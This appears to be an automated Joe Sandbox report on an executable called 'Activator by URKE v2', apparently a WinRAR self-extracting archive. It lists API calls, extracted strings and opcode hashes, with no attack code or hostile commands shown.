                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E5F22F54
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F1AEC4: GetCurrentProcess.KERNEL32(00007FF7E5F2415D), ref: 00007FF7E5F1AEF1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                                  • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E5EFFD53), ref: 00007FF7E5EF3C05
                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E5EFFD53), ref: 00007FF7E5EF3C39
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E5EFFD53), ref: 00007FF7E5EF3C63
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1365068426-0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1061551593-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2169056816-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                  • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                  • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
                                                                                                                                                                                                                                                  • Instruction ID: 7d6464ef92245882d880fc8d9696a6a0c8473787d571980db0491ee09eb32cd3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FF0C8717286598BDBA49F68A45276977D0F708784F90803AE58DC3B04CB3C94508F14
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                  • Opcode ID: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                                                                                                                                                                                                                                  • Instruction ID: 7ae77ca3f8ac17f17bf2cca73c66a494a2d9cbdac7e772d245d7bfe354831121
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D211764E09A4F81FE15BB11A9743F5A2A0AF54F40FC40436C90E86AA6EE3CE945C322
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                                                                                                                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                                                                                                                                                                  • API String ID: 431506467-1315819833
                                                                                                                                                                                                                                                  • Opcode ID: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
                                                                                                                                                                                                                                                  • Instruction ID: 62a9b9ac50cb31b437357371ebffbc0ddb8ecaf71631f703de33cd37cbc6ec05
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AB10462F1974A85FB00EB64D4643EC6362AF45B98F844232DF5CA7ADADE3CD055C321
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                                                                                                                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                                                                                  • API String ID: 2868844859-1533471033
                                                                                                                                                                                                                                                  • Opcode ID: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
                                                                                                                                                                                                                                                  • Instruction ID: 6e994d56211249263d3a033c9e5154cf43360ec80d016601a2ad670de76cd525
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A81D062F08A0A85EB00FB61D5603EDB332AF44B98F844137DE5D976DAEE38D506C361
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                  • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                                  • Opcode ID: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                                                                                                                                                                                                                                  • Instruction ID: 1b81653ff26436e06a8e2998facf950ff7f0eb46e6e8498f301990e144cf4935
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D141EEBAB19B4889E700DF21E861BED73A4EB09B98F804136EE4C87B55DE3CD425C345
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                                                                                                                                                                  • String ID: STATIC
                                                                                                                                                                                                                                                  • API String ID: 2845197485-1882779555
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: UNC$\\?\
                                                                                                                                                                                                                                                  • API String ID: 4097890229-253988292
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ItemTextWindow
                                                                                                                                                                                                                                                  • String ID: LICENSEDLG
                                                                                                                                                                                                                                                  • API String ID: 2478532303-2177901306
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                                                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                                  • API String ID: 2915667086-2207617598
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                                                                                  • API String ID: 3668304517-227171996
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 2940173790-393685449
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F00AA0: CompareStringW.KERNEL32(?,?,00007FF7E5EF6C19), ref: 00007FF7E5F00ABF
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF12BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E5EF13B6
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F00AD0: CompareStringW.KERNEL32 ref: 00007FF7E5F00B36
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F01DC2
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F01DC8
                                                                                                                                                                                                                                                  • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E5F01E25
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                                                                                                                                                                                                                                  • String ID: .zipx$.zx$z%s%02d
                                                                                                                                                                                                                                                  • API String ID: 2859674139-515631857
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A901
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A90F
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A939
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A97F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF7E5F1AA83,?,?,?,00007FF7E5F187EE,?,?,?,00007FF7E5F187A9), ref: 00007FF7E5F1A98B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF7E5F15003,?,?,?,00007FF7E5F153BA), ref: 00007FF7E5F150BB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7E5F15003,?,?,?,00007FF7E5F153BA), ref: 00007FF7E5F150D8
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7E5F15003,?,?,?,00007FF7E5F153BA), ref: 00007FF7E5F150F4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                  • API String ID: 667068680-1718035505
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 2889003569-2084237596
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm$f
                                                                                                                                                                                                                                                  • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                  • Opcode ID: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                                                                                                  • Instruction ID: b25238a2539f5b07a6a70f847a45a72f87011ba43d3f30cd367750e7ae5221ea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251F732B0960686DB54EF15E660BB9B795FB44FA4F908172DE0E83749DF38E841CB21
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$Show$Rect
                                                                                                                                                                                                                                                  • String ID: RarHtmlClassName
                                                                                                                                                                                                                                                  • API String ID: 2396740005-1658105358
                                                                                                                                                                                                                                                  • Opcode ID: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                                                                                                                                                                                                                                  • Instruction ID: 7e360427ef429a5288097f35e6d253f785426b847048d98cd617c80219b5dec3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB51956660878986EA24EB25E4703BEE7A0FB85F84F844132DE8E83B55CF3CE405C711
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                                                                  • API String ID: 3540648995-3493335439
                                                                                                                                                                                                                                                  • Opcode ID: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                                                                                                                                                                                                                                  • Instruction ID: 516abe0c22d58f49bb067f1fdea551047247a1f4095385310f18068e202af661
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E31C162A14B0984EB00AB65D9A42EDB371EB44F98F840136DE4D97AA9CE3CD081C361
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                                                                  • API String ID: 0-56093855
                                                                                                                                                                                                                                                  • Opcode ID: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                                                                                                  • Instruction ID: 4502c88def4379e53369e67adea6fd75f6373802a3549d1228258780f72d5d68
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E213D6490CA4F81EA10AB19F9647E4B7A1BF44F89FD40033C58DC7365DE3DE6558322
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                                                                                                  • Instruction ID: 189647a145b0ade6576a464fc0bbb0c4ab36a236153de099e939c85cbf7cac43
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F04465A1964A81EF54AB51F4A43F9A360EF88F90F841036DD4F86665DE3CE484C722
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                  • Opcode ID: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
